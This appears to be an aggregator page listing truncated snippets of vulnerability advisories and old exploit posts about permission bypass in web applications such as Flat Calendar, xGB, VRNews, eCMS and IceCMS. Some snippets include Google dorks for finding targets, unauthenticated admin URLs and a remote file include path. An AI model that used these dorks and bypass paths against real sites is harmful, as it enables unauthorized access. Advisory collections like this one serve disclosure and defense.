warehouse 授权问题漏洞

Warehouse is a small-scale warehouse logistics management system developed by Yeqifu’s individual developer, based on Spring Boot. There is an authorization issue in Warehouse; this vulnerability stems from insufficient authorization verification for user operations within the permission manageme...

PT-2024-17024 · Unknown · Code4Berry Decoration Management System

Name of the Vulnerable Software and Affected Versions: Code4Berry Decoration Management System version 1.0 Description: A problematic issue was found in the Code4Berry Decoration Management System, affecting an unknown part of the file /decoration/admin/user permission.php of the component User...

PT-2023-32765 · Thecosy · Thecosy Icecms

Name of the Vulnerable Software and Affected Versions: Thecosy IceCMS version 2.0.1 Description: A critical vulnerability was found in Thecosy IceCMS, affecting an unknown function of the file /article/DelectArticleById/ of the component Article Handler. This issue leads to permission problems an...

PT-2023-26032 · Unknown · Intergard Sgs

Name of the Vulnerable Software and Affected Versions: Intergard SGS version 8.7.0 Description: A critical issue was found, affecting an unknown function and leading to permission issues. The manipulation can be launched remotely. The issue has been disclosed publicly and may be used for attacks...

SUSE CVE-2023-2459

Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to bypass permission restrictions via a crafted HTML page. Chromium security severity: Medium...

ezCourses Remote Permission Bypass

,-.-. | | | | | o ,---. o | o | | |,---.,---.|---.,---.,---.|---. |---|,---.,---.|/ .,---.,---. |---|,---.,---.,---.,---..,---.|--- .,---.,---. | | |,---|| || || |---'| | | |,---|| | \ || || | | |---.---.| || |,---|| || || | ' '---^---| ' ---'---'o '---^---' '---|o '---'---'---'---'---^---'---' '...

Jax Calendar v1.34 Remote Permission Bypass Vulnerability

Exploit for php platform in category web applications ========================================================= Jax Calendar v1.34 Remote Permission Bypass Vulnerability ========================================================= FOUND BY: R4M! - email protected DORK: inurl:?do=editentry SCRIPT: Ja...

Flat Calendar v1.1 Remote Permission Bypass Vulnerability

Flat Calendar v1.1 Remote Permission Bypass Vulnerability Author : CrackersChild Dork : Flat Calendar: View All Flat Calendar: View All iзin yaklak 654.000 sonuзtan Exploits: site.com/calenderpath/admin/add.php Adding New Evetns without admin permissions...

flatcal-bypass.txt

Flat Calendar v1.1 Remote Permission Bypass Vulnerability Author : CrackersChild Dork : Flat Calendar: View All Flat Calendar: View All için yaklaşık 654.000 sonuçtan Exploits: site.com/calenderpath/admin/add.php Adding New Evetns without admin permissions...

eCMS 0.4.2 - SQL Injection Security Bypass

eCMS 0.4.2 - SQL Injection Security Bypass ...::::eCMS-v0.4.2 SQL/PB Multiple Remote Vulnerabilities ::::... Virangar Security Team www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz...

eCMS 0.4.2 (SQL/PB) Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications =================================================== eCMS 0.4.2 SQL/PB Multiple Remote Vulnerabilities =================================================== ...::::eCMS-v0.4.2 SQL/PB Multiple Remote Vulnerabilities ::::... -------- Discoverd ...

eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities

...::::eCMS-v0.4.2 SQL/PB Multiple Remote Vulnerabilities ::::... Virangar Security Team www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world...

ecms-sql.txt

...::::eCMS-v0.4.2 SQL/PB Multiple Remote Vulnerabilities ::::... Virangar Security Team www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world...

newsmanager-rfisql.txt

News Manager 2.0 Multiple Vulnerabilities Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten" 1- Remote File Include Vulnerability /chreadalso.php?readxmlinclude=http://localhost/020.txt 2-...

xgb-bypass.txt

/ xGB 2.0 xGB.php Remote Permission Bypass Vulnerability Bug discovered by DarkFuneral http://www.darkfuneral89.altervista.org/ Affected Software: xGB CMS Site: "i don't know! :P" Severity: Critical Description: An attacker can edit all message in xGB Google Dork: allinurl:"xGb.php" E-Mail:...

xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability

Exploit for unknown platform in category web applications ======================================================== xGB 2.0 xGB.php Remote Permission Bypass Vulnerability ======================================================== / xGB 2.0 xGB.php Remote Permission Bypass Vulnerability Bug discovere...

xGB 2.0 - xGB.php Remote Security Bypass

xGB 2.0 - xGB.php Remote Security Bypass / xGB 2.0 xGB.php Remote Permission Bypass Vulnerability Bug discovered by DarkFuneral http://www.darkfuneral89.altervista.org/ Affected Software: xGB CMS Site: "i don't know! :P" Severity: Critical Description: An attacker can edit all message in xGB Goog...

Joomla! Component Expose RC35 - Arbitrary File Upload

Joomla! Component Expose RC35 - Arbitrary File Upload HHHHHHH HHHHHH HH HHHHHHHH HHHHHH HHHHHHHH IHHI HH HH HHHHHHHH HH HH HH HH HH HHHHHHHH HH IHHI HH HHH HH HHHHHHHH HH HH HH HH HH HH HH HH HH HHHH HH HH HHHHHHH HHHHHH HH HHHHHHH HHHHHH HH HH HH HH HH HHHHHHHH HH HH HH HH HH HH HH HH HH HHHH HH...

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

No description provided by source. VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3. /VRNews/admin.php?act=confi...

Change a user's password remotely

I would like to be able to change a user's password remotely. Suggested API and implementation as follows: codevoid changePasswordUser admin, String username, String password throws RemoteException, RemoteValidationException, RemotePermissionException;code code public void changePasswordUser admi...